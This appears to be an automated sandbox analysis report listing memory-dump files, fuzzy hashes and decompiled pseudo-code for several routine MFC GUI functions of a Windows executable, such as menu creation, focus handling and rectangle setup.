Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1099lstrlen
String ID:
API String ID: 1928622403-0
Opcode ID: 4bee647f69ad603efc3166ba525d039519d78af2bd8e619416e6206c4d70769b
Instruction ID: 340161a27acc3d8fbd15cc7f2a3f47fe8300a58bbd696ad4711903d47e2d7cac
Opcode Fuzzy Hash: 4bee647f69ad603efc3166ba525d039519d78af2bd8e619416e6206c4d70769b
Instruction Fuzzy Hash: F1017172A10118FBCF10AFA6DC428DFBB6DEF41294741842AF901D7210D674DA50CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 004014E2, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004014E2(void* __ecx, void* __eflags) {
				intOrPtr _t26;
				void* _t27;
				void* _t37;
				void* _t43;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				L004269E6();
				_t48 = _t47 - 0xb0;
				_t43 = __ecx;
				_push(_t45 - 0x10);
				L0040184D(__ecx + 0x218);
				_t26 =  *((intOrPtr*)(_t45 - 0x10));
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				if( *((intOrPtr*)(_t26 - 8)) != 0) {
					_t27 = E004010CD(_t45 - 0xbc, 0);
					_t37 = _t45 - 0xbc;
					 *(_t45 - 4) = 1;
					L004263C0();
					_t52 = _t27 - 1;
					if(_t27 == 1) {
						_push(_t37);
						 *((intOrPtr*)(_t45 - 0x14)) = _t48;
						L00402261(_t45 - 0xbc, _t48);
						 *((intOrPtr*)(_t45 - 0x18)) = _t48;
						 *(_t45 - 4) = 2;
						L0042611A();
						 *(_t45 - 4) = 1;
						E00401055(_t43, _t52, _t45 - 0x10, _t45 - 0xbc);
					}
					 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
					_t26 = L00401875(_t45 - 0xbc);
				}
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t26;
			}

0x0040d6be
0x0040d6c3
0x0040d6ca
0x0040d6cf
0x0040d6d6
0x0040d6db
0x0040d6de
0x0040d6e6
0x0040d6f0
0x0040d6f5
0x0040d6fb
0x0040d6ff
0x0040d704
0x0040d707
0x0040d709
0x0040d712
0x0040d716
0x0040d721
0x0040d725
0x0040d729
0x0040d730
0x0040d734
0x0040d734
0x0040d739
0x0040d743
0x0040d743
0x0040d748
0x0040d74f
0x0040d758
0x0040d760

APIs

_EH_prolog.MSVCRT ref: 0040D6BE
#800.MFC42(?), ref: 0040D74F

Part of subcall function 004010CD: _EH_prolog.MSVCRT ref: 0040E25A
Part of subcall function 004010CD: #324.MFC42(00000088,?), ref: 0040E26F
Part of subcall function 004010CD: #567.MFC42(00000088,?), ref: 0040E27D
Part of subcall function 004010CD: #540.MFC42(00000088,?), ref: 0040E294
Part of subcall function 004010CD: #860.MFC42(00442178,00000088,?), ref: 0040E2AA

#2514.MFC42(?), ref: 0040D6FF
#535.MFC42(?,?,?,?,?), ref: 0040D729

Part of subcall function 00401055: _EH_prolog.MSVCRT ref: 0040D650
Part of subcall function 00401055: #535.MFC42(?), ref: 0040D66B
Part of subcall function 00401055: #535.MFC42(?,?,?), ref: 0040D67E
Part of subcall function 00401055: #800.MFC42(?,?,?), ref: 0040D699
Part of subcall function 00401055: #800.MFC42(?,?,?), ref: 0040D6A5

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800H_prolog$#2514#324#540#567#860
String ID:
API String ID: 2883411993-0
Opcode ID: a714feef5f15b4dbc0e4c69aa31332e488001345331a28b91f9b80bfc68ec9ce
Instruction ID: 6261ff74c0be57b3064648453a0a6da14e5df5efb8328a418da3309125baa662
Opcode Fuzzy Hash: a714feef5f15b4dbc0e4c69aa31332e488001345331a28b91f9b80bfc68ec9ce
Instruction Fuzzy Hash: 6A117371D10268DBDB15EBA5C946BEDB7B4AF14304F1041AFE016732D2CBB85B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401460, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401460(void* __ecx, void* __eflags) {
				void* _t28;
				void* _t44;
				void* _t46;

				L004269E6();
				 *((intOrPtr*)(_t44 - 0x10)) = _t46 - 0x128;
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *(_t44 - 4) = 1;
				L00401A46(_t44 - 0x34);
				_push(__ecx + 0x24);
				 *(_t44 - 4) = 2;
				L00426054();
				 *((intOrPtr*)(_t44 - 0x2c)) =  *((intOrPtr*)(__ecx + 0x28));
				_push(_t44 + 8);
				L00426054();
				_push(_t44 - 0x34);
				 *((intOrPtr*)(_t44 - 0x24)) = 3;
				L00401302(__ecx);
				 *(_t44 - 4) = 1;
				_t28 = L00401D48(_t44 - 0x34);
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t28;
			}

0x0040b53a
0x0040b54a
0x0040b54d
0x0040b554
0x0040b558
0x0040b563
0x0040b564
0x0040b568
0x0040b573
0x0040b579
0x0040b57a
0x0040b584
0x0040b585
0x0040b58c
0x0040b594
0x0040b598
0x0040b59d
0x0040b5a4
0x0040b5ae
0x0040b5b7

APIs

_EH_prolog.MSVCRT ref: 0040B53A
#858.MFC42(?), ref: 0040B568
#858.MFC42(?,?), ref: 0040B57A
#800.MFC42(?,?,?), ref: 0040B5A4

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #858$#800H_prolog
String ID:
API String ID: 765423493-0
Opcode ID: da07c192afc43defc0ba66ddbc36dd1fc4b4ffc3594cd150a655762dc371292a
Instruction ID: 167b8843d25f126e2729e943e2a3846d4b7e884193f788c34901c6014efe7423
Opcode Fuzzy Hash: da07c192afc43defc0ba66ddbc36dd1fc4b4ffc3594cd150a655762dc371292a
Instruction Fuzzy Hash: 8901C431901158EFCB00EF95D145ADDBBF8EF14318F50415EE005B3281DB785B08CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041854D, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041854D(void* __ecx) {
				void* _t30;
				signed int _t33;
				void* _t35;

				L004269E6();
				_push(__ecx);
				_t30 = __ecx;
				_push(0x54);
				L00425E38();
				 *((intOrPtr*)(_t35 - 0x10)) = E004294F6;
				_t33 = 0;
				 *(_t35 - 4) = 0;
				if(E004294F6 != 0) {
					_t33 = L004020E5(E004294F6);
				}
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t33 + 0x48)) =  *((intOrPtr*)(_t30 + 0x48));
				 *((intOrPtr*)(_t33 + 0x44)) =  *((intOrPtr*)(_t30 + 0x44));
				 *((intOrPtr*)(_t33 + 0x3c)) =  *((intOrPtr*)(_t30 + 0x3c));
				 *((intOrPtr*)(_t33 + 0x40)) = 1;
				_push(CreatePopupMenu());
				L004266DE();
				_push(0xffffffff);
				_push( *((intOrPtr*)(_t33 + 4)));
				_push(0x10);
				_push( *((intOrPtr*)(_t35 + 8)));
				L00402022(_t30);
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t33;
			}

0x00418552
0x00418557
0x0041855a
0x0041855c
0x0041855e
0x00418566
0x00418569
0x0041856d
0x00418570
0x00418577
0x00418577
0x0041857c
0x00418580
0x00418586
0x0041858c
0x0041858f
0x0041859c
0x0041859f
0x004185a4
0x004185a8
0x004185ab
0x004185ad
0x004185b0
0x004185bc
0x004185c4

APIs

_EH_prolog.MSVCRT ref: 00418552
#823.MFC42(00000054), ref: 0041855E
CreatePopupMenu.USER32 ref: 00418596
#1644.MFC42(00000000), ref: 0041859F

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1644#823CreateH_prologMenuPopup
String ID:
API String ID: 1494437324-0
Opcode ID: 74995cac1a29df34129f4cac365a9a14bff695062e554b243be6ca46768613c3
Instruction ID: 1e82190181eb29da45d886b5918d24cf7fdfd179e228ca7710e1a12ac8e0d460
Opcode Fuzzy Hash: 74995cac1a29df34129f4cac365a9a14bff695062e554b243be6ca46768613c3
Instruction Fuzzy Hash: 0D017171B00624AFC724DF59D90565EBAF1FB48724F50462FB155D3BC0CBB5A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00412676, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412676(intOrPtr __ecx) {
				intOrPtr _t34;
				void* _t36;

				L004269E6();
				_push(__ecx);
				_t34 = __ecx;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42e514;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				L0042650A();
				 *((intOrPtr*)(__ecx + 8)) = 0x42e4fc;
				 *((char*)(_t36 - 4)) = 1;
				L0042650A();
				 *(__ecx + 0x44) =  *(__ecx + 0x44) | 0xffffffff;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0x42e4b4;
				 *((intOrPtr*)(__ecx)) = 0x42e4cc;
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0xc0c0c0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				GetCPInfo(0, 0x4421d0);
				 *((intOrPtr*)(_t34 + 0x50)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x0041267b
0x00412680
0x00412684
0x00412688
0x0041268b
0x00412691
0x00412697
0x0041269c
0x004126a1
0x004126aa
0x004126b0
0x004126b5
0x004126b9
0x004126c2
0x004126c9
0x004126cf
0x004126d2
0x004126d5
0x004126d8
0x004126db
0x004126e2
0x004126e5
0x004126ee
0x004126f6
0x004126fe

APIs

_EH_prolog.MSVCRT ref: 0041267B
#500.MFC42 ref: 0041269C
#500.MFC42 ref: 004126B0
GetCPInfo.KERNEL32(00000000,004421D0), ref: 004126E5

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #500$H_prologInfo
String ID:
API String ID: 59146550-0
Opcode ID: 46830574a98dcd9293a4541b0d8498e0fa689a163bd285a33849df2c9d508c5a
Instruction ID: 172b76ca5c7f68926e987b07f6f9c25b0e76ea78a6d96e944574e0c08f8a741a
Opcode Fuzzy Hash: 46830574a98dcd9293a4541b0d8498e0fa689a163bd285a33849df2c9d508c5a
Instruction Fuzzy Hash: 340109B1A00B21DFC7249F1AA98024AFBF4FF917587509A1FE49283AA1C7F8A544CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0, Relevance: 6.0, APIs: 4, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004011E0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t11;
				struct HWND__* _t12;
				struct HWND__* _t14;
				intOrPtr _t19;
				intOrPtr* _t21;

				_t21 = __ecx;
				L00401073(__ecx, _a4, _a8);
				_t11 =  *((intOrPtr*)( *__ecx + 0x114))();
				if(_t11 != 0) {
					_t12 = GetFocus();
					_push(_t12);
					L00426372();
					_t19 =  *((intOrPtr*)(_t21 + 0x100));
					if(_t12 == 0) {
						L6:
						_t11 = 0;
					} else {
						_t14 =  *(_t12 + 0x20);
						if(_t14 == 0 || IsChild( *(_t21 + 0x20), _t14) == 0) {
							goto L6;
						} else {
							_t11 = 1;
						}
					}
					 *((intOrPtr*)(_t21 + 0x100)) = _t11;
					if(_t11 != _t19) {
						return SendMessageA( *(_t21 + 0x20), 0x85, 0, 0);
					}
				}
				return _t11;
			}

0x0040ef92
0x0040ef9c
0x0040efa5
0x0040efad
0x0040efb0
0x0040efb6
0x0040efb7
0x0040efbc
0x0040efc4
0x0040efe0
0x0040efe0
0x0040efc6
0x0040efc6
0x0040efcb
0x00000000
0x0040efdb
0x0040efdd
0x0040efdd
0x0040efcb
0x0040efe4
0x0040efeb
0x00000000
0x0040eff9
0x0040efeb
0x0040f000

APIs

GetFocus.USER32 ref: 0040EFB0
#2864.MFC42(00000000), ref: 0040EFB7
IsChild.USER32(?,?), ref: 0040EFD1
SendMessageA.USER32 ref: 0040EFF9

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2864ChildFocusMessageSend
String ID:
API String ID: 4174092889-0
Opcode ID: 7df797e7b2dd4f75ad52cd57a5df0426c777171adbd4fba5656717dd07527628
Instruction ID: 22cdc8c831ad99d11bad130c00ba65dbd51889d543869d1d24dffdbdb0775b81
Opcode Fuzzy Hash: 7df797e7b2dd4f75ad52cd57a5df0426c777171adbd4fba5656717dd07527628
Instruction Fuzzy Hash: A9013C31304212BFE7219B269C09F6B76A8BF48740F144D3AB586E62E4EBB5E8119658

Uniqueness

Uniqueness Score: -1.00%

Function 0041E60E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041E60E(intOrPtr __ecx) {
				intOrPtr _t31;
				void* _t33;

				L004269E6();
				_push(__ecx);
				_t31 = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = __ecx;
				L00425E08();
				 *((intOrPtr*)(_t33 - 4)) = 0;
				L00425E08();
				 *((intOrPtr*)(__ecx + 0x10)) = 0x42dce0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0x42dce0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x44)) = 0;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				SetRect(__ecx + 0x20, 0, 0, 0, 0);
				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
				return _t31;
			}

0x0041e613
0x0041e618
0x0041e61a
0x0041e61d
0x0041e623
0x0041e62d
0x0041e630
0x0041e63b
0x0041e63e
0x0041e647
0x0041e64b
0x0041e64e
0x0041e651
0x0041e654
0x0041e657
0x0041e65a
0x0041e65d
0x0041e660
0x0041e662
0x0041e665
0x0041e672
0x0041e67a

APIs

_EH_prolog.MSVCRT ref: 0041E613
#540.MFC42 ref: 0041E623
#540.MFC42 ref: 0041E630
SetRect.USER32 ref: 0041E665

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540$H_prologRect
String ID:
API String ID: 4121290371-0
Opcode ID: 8496e038da5ed10fdd4dd51dbc6483bdf727b728101d3c313a105933b9db2de3
Instruction ID: 83dcbb803d5d9c3e3a3ccbd7d1f07e2c835fc92610e342f4f29c75e5655d86d2
Opcode Fuzzy Hash: 8496e038da5ed10fdd4dd51dbc6483bdf727b728101d3c313a105933b9db2de3
Instruction Fuzzy Hash: A10190B5A10B209FC3309F1AE94195AFBF8FFA56107404A1FA496D2A20D7B4A604CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040207C, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040207C(void* __ecx, void* __eflags) {
				void* _t17;
				void* _t20;
				void* _t28;
				intOrPtr _t30;

				L004269E6();
				_push( *((intOrPtr*)(_t28 + 0xc)));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *((intOrPtr*)(_t28 + 0xc)) = _t30;
				L0042611A();
				_t20 = __ecx + 0x218;
				E00401726(_t20, _t28 + 8, __ecx);
				_push(_t20);
				 *((intOrPtr*)(_t28 + 0xc)) = _t30;
				_push(_t28 + 8);
				L0042611A();
				_push(1);
				_t17 = L004014C9(__ecx);
				 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t17;
			}

0x0040d590
0x0040d598
0x0040d59b
0x0040d5a5
0x0040d5a9
0x0040d5ae
0x0040d5b4
0x0040d5b9
0x0040d5bf
0x0040d5c2
0x0040d5c3
0x0040d5c8
0x0040d5cc
0x0040d5d1
0x0040d5d8
0x0040d5e1
0x0040d5e9

APIs

_EH_prolog.MSVCRT ref: 0040D590
#535.MFC42(?,?,?), ref: 0040D5A9

Part of subcall function 00401726: _EH_prolog.MSVCRT ref: 0040AAE4
Part of subcall function 00401726: SendMessageA.USER32 ref: 0040AB18
Part of subcall function 00401726: #2915.MFC42(?), ref: 0040AB40
Part of subcall function 00401726: #5572.MFC42(000000FF,?), ref: 0040AB56
Part of subcall function 00401726: SendMessageA.USER32 ref: 0040AB6C
Part of subcall function 00401726: #800.MFC42 ref: 0040AB76

#535.MFC42(?,?,?), ref: 0040D5C3
#800.MFC42(00000001,?,?,?), ref: 0040D5D8

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800H_prologMessageSend$#2915#5572
String ID:
API String ID: 1189720065-0
Opcode ID: d4a61205231731c8282ea76ed0ef12fef10e474b9983ab544a4f258dd33f1770
Instruction ID: 4ad2796f5dac447004704026fbccb0e4ce08cf83dc34ed721446c5b33a4290fe
Opcode Fuzzy Hash: d4a61205231731c8282ea76ed0ef12fef10e474b9983ab544a4f258dd33f1770
Instruction Fuzzy Hash: A7F09071A10218BBCB04EF55D443AED7B68EB04368F40C12FF826671D2CB78AB05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004250F8, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004250F8(void* __ecx) {
				char _v8;
				void* __ebp;
				signed int _t10;
				void* _t12;
				void* _t20;

				_t10 =  *(__ecx + 4);
				_t12 = L004010FF(__ecx);
				L00425DF0();
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				 *(__ecx + 0xc) =  *(__ecx + 0xc) & 0x00000000;
				__imp__??0_Lockit@std@@QAE@XZ( *(__ecx + 4),  &_v8,  *_t10, _t10, _t20, __ecx);
				 *0x442314 =  *0x442314 - 1;
				if( *0x442314 == 0) {
					_push( *0x442310);
					L00425DF0();
					 *0x442310 =  *0x442310 & 0x00000000;
				}
				__imp__??1_Lockit@std@@QAE@XZ();
				return _t12;
			}

0x004250ff
0x0042510c
0x00425114
0x00425119
0x0042511d
0x00425125
0x0042512b
0x00425132
0x00425134
0x0042513a
0x0042513f
0x00425146
0x0042514a
0x00425151

APIs

#825.MFC42(?,?,?,?), ref: 00425114
??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00425125
#825.MFC42(?), ref: 0042513A
??1_Lockit@std@@QAE@XZ.MSVCP60(?), ref: 0042514A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #825Lockit@std@@$??0_??1_
String ID:
API String ID: 2095439190-0
Opcode ID: 57422c67f83043ef9cc619c992341cda1299ca48443defd097b7f72fac008779
Instruction ID: 85fd8ce5c6a3cf115b113f280a013869f9114d6730fa7f43a5f297af461df3fc
Opcode Fuzzy Hash: 57422c67f83043ef9cc619c992341cda1299ca48443defd097b7f72fac008779
Instruction Fuzzy Hash: A4F0E976510514DFCB15DF50ED05BB973B8EF11326F40442EF516925A1CBB86D04CF48

Uniqueness

Uniqueness Score: -1.00%

